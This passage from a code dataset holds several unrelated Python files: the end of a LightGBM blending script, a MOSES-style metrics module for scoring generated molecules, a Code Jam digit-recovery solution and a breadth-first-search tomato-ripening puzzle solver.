[df_test] + df_feat_test_list\n df_private_to_be_concatenated_list = [df_private] + df_feat_private_list\n\n # creating the new validation set on which we will do meta optimization\n df_val = pd.concat(df_val_to_be_concatenated_list, axis=1)\n df_test = pd.concat(df_test_to_be_concatenated_list, axis=1)\n df_private = pd.concat(df_private_to_be_concatenated_list, axis=1)\n\n # now we are in full meta-model mode\n # watchout! they are unsorted now, you got to re-sort the dfs\n df_metatrain, df_metaval = train_test_split(df_val, test_size=0.1, random_state=16+1)\n df_metatrain.sort_index(inplace=True)\n df_metaval.sort_index(inplace=True)\n\n # split dataframe columns in train and label\n col_names_list = [df_feat.columns[0] for df_feat in df_feature_list]\n\n extended_features = df_test.columns\n df_metatrain_label = df_metatrain[label]\n df_metatrain = df_metatrain[extended_features]\n\n df_metaval_label = df_metaval[label]\n df_metaval = df_metaval[extended_features]\n\n for i in range(len(df_metatrain.columns)):\n assert df_metatrain.columns[i] == df_test.columns[i], f'You fucked yourself. metatrain col {i}: {df_metatrain.columns[i]}' \\\n f' test col {i}: {df_test.columns[i]}'\n assert df_metatrain.columns[i] == df_private.columns[i], \\\n f'You fucked yourself. metatrain col {i}: {df_metatrain.columns[i]} private test col {i}: {df_test.columns[i]}'\n\n model_name = \"lightgbm_classifier\"\n kind = LABEL\n\n params = {\n 'num_leaves': 158.78294478107375,\n 'learning_rate': 0.01001509614042722,\n 'max_depth': 16,\n 'lambda_l1': 2.247948350186734,\n 'lambda_l2': 29.341017931146695,\n 'colsample_bynode': 0.4,\n 'colsample_bytree': 0.4697183272881687,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 7,\n 'max_bin': 4999.999999999999,\n 'min_data_in_leaf': 11.175673384174504,\n }\n\n LGBM = LightGBM(\n objective='binary',\n num_threads=-1,\n num_iterations=1500,\n early_stopping_rounds=20,\n **params,\n )\n\n # LGBM Training\n training_start_time = time.time()\n LGBM.fit(X=df_metatrain, Y=df_metatrain_label, X_val=df_metaval, Y_val=df_metaval_label,\n categorical_feature=set([]))\n print(f\"Training time: {time.time() - training_start_time} seconds\")\n\n # LGBM Evaluation\n evaluation_start_time = time.time()\n prauc, rce, conf, max_pred, min_pred, avg = LGBM.evaluate(df_metaval.to_numpy(), df_metaval_label.to_numpy())\n print(\"since I'm lazy I did the local test on the same test on which I did EarlyStopping\")\n print(f\"PRAUC:\\t{prauc}\")\n print(f\"RCE:\\t{rce}\")\n print(f\"TN:\\t{conf[0, 0]}\")\n print(f\"FP:\\t{conf[0, 1]}\")\n print(f\"FN:\\t{conf[1, 0]}\")\n print(f\"TP:\\t{conf[1, 1]}\")\n print(f\"MAX_PRED:\\t{max_pred}\")\n print(f\"MIN_PRED:\\t{min_pred}\")\n print(f\"AVG:\\t{avg}\")\n print(f\"Evaluation time: {time.time() - evaluation_start_time} seconds\")\n\n # public prediction\n prediction(LGBM=LGBM, dataset_id=test_dataset, df=df_test, label=LABEL)\n\n # private prediction\n prediction(LGBM=LGBM, dataset_id=private_test_dataset, df=df_private, label=LABEL)\n\n LGBM.permutation_importance(X_tst=df_metaval, Y_tst=df_metaval_label)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Blending/last_test_sub/last_blending_sub_comment.py","file_name":"last_blending_sub_comment.py","file_ext":"py","file_size_in_byte":24033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635343836","text":"\"\"\"\nAdapted from MOlecular SEtS (MOSES) benchmark\nhttps://github.com/molecularsets/moses\n\"\"\"\n\nimport warnings\nfrom 
multiprocessing import Pool\nimport numpy as np\nimport rdkit\nfrom scipy.spatial.distance import cosine as cos_distance\nfrom fcd_torch import FCD as FCDMetric\nfrom scipy.stats import wasserstein_distance\n\nfrom moleval.metrics.utils import mapper\nfrom moleval.metrics.utils import disable_rdkit_log, enable_rdkit_log\nfrom moleval.metrics.metrics_utils import SA, QED, NP, weight, logP\nfrom moleval.metrics.metrics_utils import compute_fragments, average_agg_tanimoto, \\\n compute_scaffolds, fingerprints, numpy_fps_to_bitvectors, sphere_exclusion,\\\n get_mol, canonic_smiles, mol_passes_filters, analogues_tanimoto, compute_functional_groups, compute_ring_systems\n\n\n# Modify this function so that it doesn't depend on metrics dataset\nclass GetMosesMetrics(object):\n \"\"\"\n Computes all available metrics between test (scaffold test)\n and generated sets of SMILES.\n Parameters:\n gen: list of generated SMILES\n n: Chunk size to calculate intermediate statistics\n n_col: Alternatively column name of batch/step variable e.g. \"step\"\n n_jobs: number of workers for parallel processing\n device: 'cpu' or 'cuda:n', where n is GPU device number\n batch_size: batch size for FCD metric\n pool: optional multiprocessing pool to use for parallelization\n test (None or list): test SMILES. If None, will not compare to test statistics\n test_scaffolds (None or list): scaffold test SMILES. If None, will not compare to\n scaffold test statistics\n ptest (None or dict): precalculated statistics of the test set. If\n None, will not run comparitive statistics. If you specified a custom\n test set, default test statistics will be ignored\n ptest_scaffolds (None or dict): precalculated statistics of the\n scaffold test set If None, will load default scaffold test\n statistics. If you specified a custom test set, default test\n statistics will be ignored\n ptarget (None or dict): precalculated statistics of the target set. If\n None, will not run comparitive statistics\n train (None or list): train SMILES. If None, will not run comparative statistics\n target (None or list): target SMILES. If none, will not run comparative statistics\n Available metrics:\n * %valid # Tracked by molscore and so unneccesary\n * Frechet ChemNet Distance (FCD)\n * Fragment similarity (Frag)\n * Scaffold similarity (Scaf)\n * Similarity to nearest neighbour (SNN)\n * Internal diversity (IntDiv)\n * Internal diversity 2: using square root of mean squared\n Tanimoto similarity (IntDiv2)\n * %passes filters (Filters)\n * Distribution difference for logP, SA, QED, weight\n * Novelty (molecules not present in train)\n \"\"\"\n # TODO add KL divergence?\n # TODO FG / RS inside / outside training data / reference dataset?\n # https://chemrxiv.org/articles/preprint/Comparative_Study_of_Deep_Generative_Models_on_Chemical_Space_Coverage/13234289\n # + most common scaff, unique_fg, unique_rs? 
train_fg_recoverd, test_fg_recovered, test etc.\n\n def __init__(self, n_jobs=1, device='cpu', batch_size=512, pool=None,\n test=None, test_scaffolds=None, ptest=None, ptest_scaffolds=None, train=None, ptrain=None,\n target=None, ptarget=None):\n self.n_jobs = n_jobs\n self.device = device\n self.batch_size = batch_size\n self.pool = pool\n self.close_pool = False\n self.test = test\n self.test_scaffolds = test_scaffolds\n self.train = train\n self.target = target\n # Clean up if necessary\n for att in ['test', 'test_scaffolds', 'target', 'train']:\n if getattr(self, att) is not None:\n setattr(self, att, remove_invalid(getattr(self, att), canonize=True))\n # FCD pre-statistics\n self.ptest = ptest\n self.ptest_scaffolds = ptest_scaffolds\n self.ptrain = ptrain\n self.ptarget = ptarget\n # Later defined\n self.kwargs = None\n self.kwargs_fcd = None\n self.test_int = None\n self.test_scaffolds_int = None\n self.target_int = None\n\n # Compute any pre-statistics if needed.\n disable_rdkit_log()\n if self.pool is None:\n if self.n_jobs != 1:\n self.pool = Pool(n_jobs)\n self.close_pool = True\n else:\n self.pool = 1\n self.kwargs = {'n_jobs': 1, 'device': self.device, 'batch_size': self.batch_size}\n self.kwargs_fcd = {'n_jobs': self.n_jobs, 'device': self.device, 'batch_size': self.batch_size,\n 'canonize': False}\n\n # If test and test_scaffolds provided calculate intermediate statistics\n if self.test is not None:\n print('Computing test pre-statistics')\n self.test_int = compute_intermediate_statistics(self.test, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n if self.test_scaffolds is not None:\n print('Computing test scaffold pre-statistics')\n self.test_scaffolds_int = compute_intermediate_statistics(self.test_scaffolds, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n if self.target is not None:\n print('Computing target pre-statistics')\n self.target_int = compute_intermediate_statistics(self.target, n_jobs=self.n_jobs,\n device=self.device, batch_size=self.batch_size,\n pool=self.pool)\n\n def calculate(self, gen, calc_valid=False, calc_unique=False, unique_k=None, se_k=1000):\n metrics = {}\n metrics['#'] = len(gen)\n\n # Calculate validity\n if calc_valid:\n metrics['Validity'] = fraction_valid(gen, self.pool)\n\n gen = remove_invalid(gen, canonize=True)\n #mols = mapper(self.pool)(get_mol, gen)\n metrics['# valid'] = len(gen)\n\n # Calculate Uniqueness\n if calc_unique:\n metrics['Uniqueness'] = fraction_unique(gen=gen, k=None, n_jobs=self.pool)\n if unique_k is not None:\n metrics[f'Unique@{unique_k/1000:.0f}k'] = fraction_unique(gen=gen, k=unique_k, n_jobs=self.pool)\n\n # Now subset only unique molecules\n gen = list(set(gen))\n mols = mapper(self.pool)(get_mol, gen)\n # Precalculate some things\n mol_fps = fingerprints(mols, self.pool, already_unique=True, fp_type='morgan')\n scaffs = compute_scaffolds(mols, n_jobs=self.n_jobs)\n scaff_gen = list(scaffs.keys())\n fgs = compute_functional_groups(mols, n_jobs=self.n_jobs)\n rss = compute_ring_systems(mols, n_jobs=self.n_jobs)\n scaff_mols = mapper(self.pool)(get_mol, scaff_gen)\n metrics['# valid & unique'] = len(gen)\n\n # Calculate diversity related metrics\n if self.train is not None:\n metrics['Novelty'] = novelty(gen, self.train, self.pool)\n metrics['IntDiv1'] = internal_diversity(gen=mol_fps, n_jobs=self.pool, device=self.device)\n metrics['IntDiv2'] = internal_diversity(gen=mol_fps, n_jobs=self.pool, device=self.device, p=2)\n 
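The IntDiv metrics computed here reduce to one minus the mean pairwise Tanimoto similarity over fingerprints. A minimal self-contained sketch of that idea (not the module's batched average_agg_tanimoto; assumes RDKit is installed, and the function name is illustrative):

from rdkit import Chem
from rdkit.Chem import AllChem, DataStructs

def internal_diversity_sketch(smiles, radius=2, n_bits=2048):
    """1 - mean pairwise Tanimoto over Morgan fingerprints (O(n^2), small sets only)."""
    mols = [Chem.MolFromSmiles(s) for s in smiles]
    fps = [AllChem.GetMorganFingerprintAsBitVect(m, radius, nBits=n_bits)
           for m in mols if m is not None]
    sims = [DataStructs.TanimotoSimilarity(fps[i], fps[j])
            for i in range(len(fps)) for j in range(i + 1, len(fps))]
    if not sims:
        return 0.0
    return 1.0 - sum(sims) / len(sims)

# e.g. internal_diversity_sketch(["CCO", "c1ccccc1", "CC(=O)O"]) -> value in [0, 1]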
metrics['SEDiv'] = se_diversity(gen=mols, n_jobs=self.pool)\n if (se_k is not None) and (len(gen) >= se_k):\n metrics[f'SEDiv@{se_k/1000:.0f}k'] = se_diversity(gen=mols, k=se_k, n_jobs=self.pool, normalize=True)\n metrics['ScaffDiv'] = internal_diversity(gen=scaff_mols, n_jobs=self.pool, device=self.device,\n fp_type='morgan')\n metrics['Scaff uniqueness'] = len(scaff_gen)/len(gen)\n # Calculate number of FG and RS relative to sample size\n metrics['FG'] = len(list(fgs.keys()))/len(gen)\n metrics['RS'] = len(list(rss.keys()))/len(gen)\n # Calculate % pass filters\n metrics['Filters'] = fraction_passes_filters(mols, self.pool)\n\n # Calculate FCD\n pgen = FCDMetric(**self.kwargs_fcd).precalc(gen)\n if self.ptrain:\n metrics['FCD_train'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptrain)\n if self.ptest:\n metrics['FCD_test'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptest)\n if self.ptest_scaffolds:\n metrics['FCD_testSF'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptest_scaffolds)\n if self.ptarget:\n metrics['FCD_target'] = FCDMetric(**self.kwargs_fcd)(pgen=pgen, pref=self.ptarget)\n\n # Test metrics\n if self.test_int is not None:\n metrics['Novelty_test'] = novelty(gen, self.test, self.pool)\n metrics['AnalogueSimilarity_test'], metrics['AnalogueCoverage_test'] = \\\n FingerprintAnaloguesMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_int['Analogue'])\n metrics['FG_test'] = FGMetric(**self.kwargs)(pgen={'fgs': fgs}, pref=self.test_int['FG'])\n metrics['RS_test'] = RSMetric(**self.kwargs)(pgen={'rss': rss}, pref=self.test_int['RS'])\n metrics['SNN_test'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_int['SNN'])\n metrics['Frag_test'] = FragMetric(**self.kwargs)(gen=mols, pref=self.test_int['Frag'])\n metrics['Scaf_test'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.test_int['Scaf'])\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n metrics[f'{name}_test'] = WassersteinMetric(func, **self.kwargs)(gen=mols, pref=self.test_int[name])\n\n # Test scaff metrics\n if self.test_scaffolds_int is not None:\n metrics['SNN_testSF'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.test_scaffolds_int['SNN'])\n metrics['Frag_testSF'] = FragMetric(**self.kwargs)(gen=mols, pref=self.test_scaffolds_int['Frag'])\n metrics['Scaf_testSF'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.test_scaffolds_int['Scaf'])\n\n # Target metrics\n if self.target_int is not None:\n metrics['Novelty_target'] = novelty(gen, self.target, self.pool)\n metrics['AnalogueSimilarity_target'], metrics['AnalogueCoverage_target'] = \\\n FingerprintAnaloguesMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.target_int['Analogue'])\n metrics['FG_target'] = FGMetric(**self.kwargs)(pgen={'fgs': fgs}, pref=self.target_int['FG'])\n metrics['RS_target'] = RSMetric(**self.kwargs)(pgen={'rss': rss}, pref=self.target_int['RS'])\n metrics['SNN_target'] = SNNMetric(**self.kwargs)(pgen={'fps': mol_fps}, pref=self.target_int['SNN'])\n metrics['Frag_target'] = FragMetric(**self.kwargs)(gen=mols, pref=self.target_int['Frag'])\n metrics['Scaf_target'] = ScafMetric(**self.kwargs)(pgen={'scaf': scaffs}, pref=self.target_int['Scaf'])\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n metrics[f'{name}_target'] = WassersteinMetric(func, **self.kwargs)(gen=mols, pref=self.target_int[name])\n\n return metrics\n\n def property_distributions(self, 
gen):\n metrics = {}\n if self.test_int is not None:\n for name in ['logP', 'NP', 'SA', 'QED', 'weight']:\n metrics[f'{name}_test'] = self.test_int[name]['values']\n if self.target_int is not None:\n for name in ['logP', 'NP', 'SA', 'QED', 'weight']:\n metrics[f'{name}_test'] = self.target_int[name]['values']\n\n gen = remove_invalid(gen, canonize=True)\n gen = list(set(gen))\n mols = mapper(self.pool)(get_mol, gen)\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n\n metrics[name] = WassersteinMetric(func, **self.kwargs).precalc(mols)['values']\n return metrics\n\n def close_pool(self):\n enable_rdkit_log()\n if self.close_pool:\n self.pool.close()\n self.pool.join()\n return\n\n\ndef compute_intermediate_statistics(smiles, n_jobs=1, device='cpu',\n batch_size=512, pool=None):\n \"\"\"\n The function precomputes statistics such as mean and variance for FCD, etc.\n It is useful to compute the statistics for test and scaffold test sets to\n speedup metrics calculation.\n \"\"\"\n close_pool = False\n if pool is None:\n if n_jobs != 1:\n pool = Pool(n_jobs)\n close_pool = True\n else:\n pool = 1\n statistics = {}\n mols = mapper(pool)(get_mol, smiles)\n kwargs = {'n_jobs': pool, 'device': device, 'batch_size': batch_size}\n #kwargs_fcd = {'n_jobs': n_jobs, 'device': device, 'batch_size': batch_size}\n #statistics['FCD'] = FCDMetric(**kwargs_fcd).precalc(smiles)\n statistics['SNN'] = SNNMetric(**kwargs).precalc(mols)\n statistics['Frag'] = FragMetric(**kwargs).precalc(mols)\n statistics['Scaf'] = ScafMetric(**kwargs).precalc(mols)\n statistics['Analogue'] = FingerprintAnaloguesMetric(**kwargs).precalc(mols)\n statistics['FG'] = FGMetric(**kwargs).precalc(mols)\n statistics['RS'] = RSMetric(**kwargs).precalc(mols)\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n statistics[name] = WassersteinMetric(func, **kwargs).precalc(mols)\n if close_pool:\n pool.terminate()\n return statistics\n\n\ndef fraction_passes_filters(gen, n_jobs=1):\n \"\"\"\n Computes the fraction of molecules that pass filters:\n * MCF\n * PAINS\n * Only allowed atoms ('C','N','S','O','F','Cl','Br','H')\n * No charges\n \"\"\"\n passes = mapper(n_jobs)(mol_passes_filters, gen)\n return np.mean(passes)\n\n\ndef internal_diversity(gen, n_jobs=1, device='cpu', fp_type='morgan', p=1):\n \"\"\"\n Computes internal diversity as:\n 1/|A|^2 sum_{x, y in AxA} (1-tanimoto(x, y))\n \"\"\"\n assert isinstance(gen[0], rdkit.Chem.rdchem.Mol) or isinstance(gen[0], np.ndarray)\n\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_fps = fingerprints(gen, fp_type=fp_type, n_jobs=n_jobs)\n else:\n gen_fps = gen\n\n return 1 - (average_agg_tanimoto(gen_fps, gen_fps,\n agg='mean', device=device, p=p)).mean()\n\n\ndef se_diversity(gen, k=None, n_jobs=1, fp_type='morgan',\n dist_threshold=0.65, normalize=True):\n \"\"\"\n Computes Sphere exclusion diversity i.e. 
fraction of diverse compounds according to a pre-defined\n Tanimoto distance.\n\n :param k:\n :param gen:\n :param n_jobs:\n :param device:\n :param fp_type:\n :param gen_fps:\n :param dist_threshold:\n :param normalize:\n :return:\n \"\"\"\n assert isinstance(gen[0], rdkit.Chem.rdchem.Mol) or isinstance(gen[0], np.ndarray)\n\n if k is not None:\n if len(gen) < k:\n warnings.warn(\n f\"Can't compute SEDiv@{k/1000:.0f} \"\n f\"gen contains only {len(gen)} molecules\"\n )\n gen = gen[:k]\n\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_fps = fingerprints(gen, fp_type=fp_type, n_jobs=n_jobs)\n else:\n gen_fps = gen\n\n bvs = numpy_fps_to_bitvectors(gen_fps, n_jobs=n_jobs)\n no_diverse = sphere_exclusion(fps=bvs, dist_thresh=dist_threshold)\n if normalize:\n return no_diverse / len(gen)\n else:\n return no_diverse\n\n\ndef fraction_unique(gen, k=None, n_jobs=1, check_validity=True):\n \"\"\"\n Computes a number of unique molecules\n Parameters:\n gen: list of SMILES\n k: compute unique@k\n n_jobs: number of threads for calculation\n check_validity: raises ValueError if invalid molecules are present\n \"\"\"\n if k is not None:\n if len(gen) < k:\n warnings.warn(\n \"Can't compute unique@{}.\".format(k) +\n \"gen contains only {} molecules\".format(len(gen))\n )\n gen = gen[:k]\n canonic = set(mapper(n_jobs)(canonic_smiles, gen))\n if None in canonic and check_validity:\n raise ValueError(\"Invalid molecule passed to unique@k\")\n return len(canonic) / len(gen)\n\n\ndef fraction_valid(gen, n_jobs=1):\n \"\"\"\n Computes a number of valid molecules\n Parameters:\n gen: list of SMILES\n n_jobs: number of threads for calculation\n \"\"\"\n gen = mapper(n_jobs)(get_mol, gen)\n return 1 - gen.count(None) / len(gen)\n\n\ndef novelty(gen, train, n_jobs=1):\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_smiles = mapper(n_jobs)(canonic_smiles, gen)\n else:\n gen_smiles = gen\n gen_smiles_set = set(gen_smiles) - {None}\n train_set = set(train)\n return len(gen_smiles_set - train_set) / len(gen_smiles_set)\n\n\ndef remove_invalid(gen, canonize=True, n_jobs=1):\n \"\"\"\n Removes invalid molecules from the dataset\n \"\"\"\n if not canonize:\n mols = mapper(n_jobs)(get_mol, gen)\n return [gen_ for gen_, mol in zip(gen, mols) if mol is not None]\n return [x for x in mapper(n_jobs)(canonic_smiles, gen) if\n x is not None]\n\n\nclass Metric:\n def __init__(self, n_jobs=1, device='cpu', batch_size=512, **kwargs):\n self.n_jobs = n_jobs\n self.device = device\n self.batch_size = batch_size\n for k, v in kwargs.values():\n setattr(self, k, v)\n\n def __call__(self, ref=None, gen=None, pref=None, pgen=None):\n assert (ref is None) != (pref is None), \"specify ref xor pref\"\n assert (gen is None) != (pgen is None), \"specify gen xor pgen\"\n if pref is None:\n pref = self.precalc(ref)\n if pgen is None:\n pgen = self.precalc(gen)\n return self.metric(pref, pgen)\n\n def precalc(self, moleclues):\n raise NotImplementedError\n\n def metric(self, pref, pgen):\n raise NotImplementedError\n\n\nclass SNNMetric(Metric):\n \"\"\"\n Computes average max similarities of gen SMILES to ref SMILES\n \"\"\"\n\n def __init__(self, fp_type='morgan', **kwargs):\n self.fp_type = fp_type\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n return {'fps': fingerprints(mols, n_jobs=self.n_jobs,\n fp_type=self.fp_type)}\n\n def metric(self, pref, pgen):\n return average_agg_tanimoto(pref['fps'], pgen['fps'],\n device=self.device)\n\n\nclass FingerprintAnaloguesMetric(Metric):\n \"\"\"\n Computes average max 
similarities of gen SMILES to ref SMILES\n \"\"\"\n\n def __init__(self, fp_type='morgan', **kwargs):\n self.fp_type = fp_type\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n return {'fps': fingerprints(mols, n_jobs=self.n_jobs,\n fp_type=self.fp_type)}\n\n def metric(self, pref, pgen):\n return analogues_tanimoto(pref['fps'], pgen['fps'],\n device=self.device) # Tuple returned (Frac analogues, analogue coverage)\n\n\ndef cos_similarity(ref_counts, gen_counts):\n \"\"\"\n Computes cosine similarity between\n dictionaries of form {name: count}. Non-present\n elements are considered zero:\n\n sim = / ||r|| / ||g||\n \"\"\"\n if len(ref_counts) == 0 or len(gen_counts) == 0:\n return np.nan\n keys = np.unique(list(ref_counts.keys()) + list(gen_counts.keys()))\n ref_vec = np.array([ref_counts.get(k, 0) for k in keys])\n gen_vec = np.array([gen_counts.get(k, 0) for k in keys])\n return 1 - cos_distance(ref_vec, gen_vec)\n\n\nclass FragMetric(Metric):\n def precalc(self, mols):\n return {'frag': compute_fragments(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['frag'], pgen['frag'])\n\n\nclass ScafMetric(Metric):\n def precalc(self, mols):\n return {'scaf': compute_scaffolds(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['scaf'], pgen['scaf'])\n\n\nclass FGMetric(Metric):\n def precalc(self, mols):\n return {'fgs': compute_functional_groups(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['fgs'], pgen['fgs'])\n\n\nclass RSMetric(Metric):\n def precalc(self, mols):\n return {'rss': compute_ring_systems(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['rss'], pgen['rss'])\n\n\nclass WassersteinMetric(Metric):\n def __init__(self, func=None, **kwargs):\n self.func = func\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n if self.func is not None:\n values = mapper(self.n_jobs)(self.func, mols)\n else:\n values = mols\n return {'values': values}\n\n def metric(self, pref, pgen):\n return wasserstein_distance(\n pref['values'], pgen['values']\n )\n","sub_path":"moleval/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":22021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"270995781","text":"import pdb\r\nimport sys\r\nimport re\r\nimport time\r\nimport collections\r\nfrom collections import namedtuple\r\nfrom itertools import *\r\nfrom copy import copy, deepcopy\r\nfrom pprint import pprint\r\nfrom glob import glob\r\n\r\ntaskname = 'A'\r\ninput_file = None\r\n\r\ndef readstr():\r\n return next(input_file).strip()\r\n\r\n\r\ndef readintlist():\r\n lst = list(map(int, readstr().split()))\r\n return lst\r\n\r\n\r\ndef readint():\r\n lst = readintlist()\r\n assert len(lst) == 1\r\n return lst[0]\r\n\r\n\r\nWORDS = [\"ZERO\", \"ONE\", \"TWO\", \"THREE\", \"FOUR\", \"FIVE\", \"SIX\", \"SEVEN\", \"EIGHT\", \"NINE\"]\r\n\r\ndef uniquely_determined(words):\r\n set_unique = {}\r\n for word in words:\r\n rest = set(c for w2 in words if w2 != word for c in w2)\r\n unique = [c for c in word if c not in rest]\r\n if unique:\r\n set_unique[word] = unique\r\n return set_unique\r\n\r\ndef get_ud_tiers():\r\n words = set(WORDS)\r\n tiers = []\r\n while words:\r\n unique = uniquely_determined(words)\r\n assert unique, 'remaining: ' + str(words) \r\n tiers.extend(list(unique.items()))\r\n words = set(words) - unique.keys()\r\n return tiers\r\n 
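get_ud_tiers above derives, at runtime, an elimination order in which each digit word has a letter unique among the words still remaining. The same order can be hard-coded; a minimal sketch of that classic greedy decode (illustrative only, the script's tier computation stays dynamic):

from collections import Counter

ORDER = [('Z', 'ZERO', 0), ('W', 'TWO', 2), ('U', 'FOUR', 4), ('X', 'SIX', 6),
         ('G', 'EIGHT', 8), ('O', 'ONE', 1), ('T', 'THREE', 3), ('F', 'FIVE', 5),
         ('S', 'SEVEN', 7), ('I', 'NINE', 9)]

def recover_digits(scrambled):
    """Rebuild the sorted digit string from a scrambled pile of digit-word letters."""
    counts = Counter(scrambled)
    found = {}
    for letter, word, digit in ORDER:
        n = counts[letter]  # 'letter' occurs once in 'word' and in no word not yet eliminated
        if n:
            found[digit] = n
            counts.subtract({c: k * n for c, k in Counter(word).items()})
    return ''.join(str(d) * found[d] for d in sorted(found))

assert recover_digits("OZONETOWER") == "012"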
\r\ntiers = get_ud_tiers()\r\n \r\n\r\ndef solvecase():\r\n s = readstr()\r\n counts = collections.Counter(s)\r\n result = {}\r\n for word, letters in tiers:\r\n l = letters[0]\r\n wordcounts = collections.Counter(word)\r\n cnt = counts[l] // wordcounts[l]\r\n if cnt:\r\n# print(word, cnt, counts)\r\n result[WORDS.index(word)] = cnt \r\n counts.subtract({k : v * cnt for k, v in wordcounts.items()})\r\n assert not any(counts.values()), counts\r\n return ''.join(str(d) * cnt for d, cnt in sorted(result.items()))\r\n\r\n\r\ndef solve(input_name, output_name):\r\n global input_file\r\n tstart = time.clock()\r\n with open(input_name, 'r') as input_file, open(output_name, 'w') as output_file:\r\n casecount = readint()\r\n \r\n for case in range(1, casecount + 1):\r\n s = solvecase()\r\n s = \"Case #%d: %s\" % (case, str(s)) \r\n print(s, file=output_file)\r\n print(s)\r\n \r\n print('%s solved in %.3f' % (input_name, time.clock() - tstart))\r\n\r\n\r\ndef main():\r\n input_names = glob(taskname + '-*.in')\r\n assert len(input_names)\r\n input_names.sort(reverse = True)\r\n for input_name in input_names:\r\n solve(input_name, input_name.replace('.in', '.out')) \r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"codes/CodeJamCrawler/16_2_1/Fj./A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200044186","text":"import sys\n\nm, n = map(int, sys.stdin.readline().split())\n\ntomato_farm = []\n\ntomato_done = 0\ntomato_all = m*n\n\nclass VertexBFS:\n\tdef __init__(self, v):\n\t\tself.v = v\n\t\tself.queue = []\n\t\tself.next_day_queue = [v]\n\n\tdef bfs_once(self):\n\t\tglobal m, n, tomato_farm, tomato_done\n\t\tself.queue = self.next_day_queue\n\t\tself.next_day_queue = []\n\t\tif(len(self.queue) == 0): return False\n\t\twhile(len(self.queue) != 0):\n\t\t\tcur_v = self.queue[0]\n\t\t\t# right\n\t\t\tif((cur_v + 1) % m != 0 and tomato_farm[cur_v+1] == 0):\n\t\t\t\ttomato_farm[cur_v+1] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v+1)\n\t\t\t# left\n\t\t\tif((cur_v % m) != 0 and tomato_farm[cur_v-1] == 0):\n\t\t\t\ttomato_farm[cur_v-1] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v-1)\n\t\t\t# up\n\t\t\tif(cur_v >= m and tomato_farm[cur_v-m] == 0):\n\t\t\t\ttomato_farm[cur_v-m] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v-m)\n\t\t\t# down\n\t\t\tif(cur_v < (n-1)*m and tomato_farm[cur_v+m] == 0):\n\t\t\t\ttomato_farm[cur_v+m] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v+m)\n\t\t\tdel self.queue[0]\n\t\treturn True\n\nfor _ in range(n):\n\ttomato_farm.extend(map(int, sys.stdin.readline().split()))\n\nstart_points = []\n\nfor i, e in enumerate(tomato_farm):\n\tif e == 1: \n\t\ttomato_done += 1\n\t\tstart_points.append(i)\n\telif e == -1: tomato_all -= 1\n\ndef all_false(l):\n\tfor element in l:\n\t\tif element:\n\t\t\treturn False\n\treturn True\n\ndef print_farm():\n\tfor i, e in enumerate(tomato_farm):\n\t\tif (i % m == 0): print()\n\t\tprint(\"{} \".format(e), end=\"\")\n\t\t\n\ndef tomato_bfs(v_list):\n\titerate = 0\n\tvclass_list = [VertexBFS(v) for v in v_list]\n\twhile(tomato_done < tomato_all):\n\t\tif all_false([c.bfs_once() for c in vclass_list]): break\n\t\titerate += 1\n\tif tomato_done != tomato_all: return -1\n\telse: return 
